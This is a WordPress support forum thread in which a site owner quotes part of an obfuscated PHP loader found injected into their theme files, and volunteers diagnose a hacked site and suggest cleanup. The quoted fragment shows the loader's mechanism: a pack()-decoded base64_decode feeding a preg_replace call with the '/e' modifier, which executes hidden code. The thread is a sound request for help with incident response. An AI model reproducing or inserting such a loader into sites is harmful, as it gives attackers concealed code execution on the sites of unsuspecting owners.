Ok, it goes something like “ZxIiB3aWssR0aD0iMXB4IiBoZWlnaHQss9IjFwe”
Could you at least tell me what is that? All my sites have it but they’re working fine.
BUT, every like 3 months or so, one of them either loses it’s css styling (looks white with text) or goes blank. I ask for a restore of a previous backup and it works again for a couple of months.
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
Did you create the theme?
I’ve tried using http://sitecheck.sucuri.net/ and it’s says NO to everything:
Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No
But it seems all my sites on that server have the weird code and I don’t know what it is. Can it be decoded somehow?
I haven’t made the themes myself.
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
Do you know how it’s encoded? With which PHP function?
Well, it starts like:
<?php /*versio:2.14*/$QOO0=0;$GLOBALS[‘QOO0’] = ‘=wY3VybAWjX2luaXQYWxsb3dfdXJsX2ZvcGVu^t;I){MQdAX3NldG9wdAny yX2V4ZWMAOUXw%.Y2
Then a HUGE chunk of gibberish that ends with:
WoQ6261736536345f6465636f6465′;if (!function_exists(‘Il111Ill’)){function Il111Ill($a, $b){$c=$GLOBALS[‘QOO0’]; $d=pack(‘H*’,substr($c, -26)); return $d(substr($c, $a, $b));}};$Q0QO0OQQO = Il111Ill(6242, 16);$Q0QO0OQQO(“/IlI1lII11/e”, Il111Ill(651, 5590), “IlI1lII11”);?><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml” <?php language_attributes(); ?>>
<head profile=”http://gmpg.org/xfn/11″>
Andrew Nevins
(@anevins)
WCLDN 2018 Contributor | Volunteer support
If you’re not aware of any PHP function like base64_encode that it uses the closest way to understanding what the code does is to look at the source code of your website for any anomalies.
But it seems all my sites on that server have the weird code and I don’t know what it is.
I’m sorry but it means your site has been hacked.
Can it be decoded somehow?
It’s probably for distributing spam or malware. What that code does isn’t important at all. What’s important is that your site was compromised.
You need to start working your way through the resources WPyogi provided above.
From what I see there’s no way to fix it without a fresh installation of WP, plugins and everything for every infected site?
The thing is that almost all the sites have lots of modifications in the code done by me, mostly simple stuff and translations to my language but it would take a lot more time than simply installing a new WP and plugins and theme.
How come that checker says that I’m not infected?
How come that checker says that I’m not infected?
It could be a new hack. The checker can also not see inside .php files. If you’ve made many modifications and never seen the malicious code before, you can reasonably presume your site is hacked.
There is no easy fix for this. Maybe you should contact your hosting company for tech support.
Here is some additional reading:
http://www.rvoodoo.com/projects/the-dreaded-base64-wordpress-hack-and-other-hacks-too/
Thanks for the link.
The weird thing is, this code doesn’t affect my site’s appearance and google has never seen my sites as “attack sites”. They don’t have any spam links on them and they work perfectly, except every few months one of them loses the styling and looks white with text on it. I run a restore and it’s back to normal again.
Not even sure the code is causing that cause it happened only three times in two years. I made a fresh install on one site and replaced everything and after a couple of months the code is back there. The sites are working fine still.
It takes a while for Google to add you to their list, and I’ve even watched an infected site go on and off the list over the course of a few months without any changes from the site.
I’d love it if you sent me the files (sean at ertw dot com), or posted them to pastebin so I could look into them. Sometimes these kinds of malware post genuine links for SEO juice, or sit around waiting for instructions. It’s hard to know.
Just for kicks, could you see if your site triggers anything at http://isithacked.com ?
Thanks,
Sean
isithacked says it’s all fine. No cloaking, spammy links, iframes or anything.
I dunno if posting the code would pose a threat to my site maybe?
Do not post any hacked code here, please – it was already removed from your first post. Use a pastebin if you want to post it.
http://codex.wordpress.org/Forum_Welcome#Posting_Code
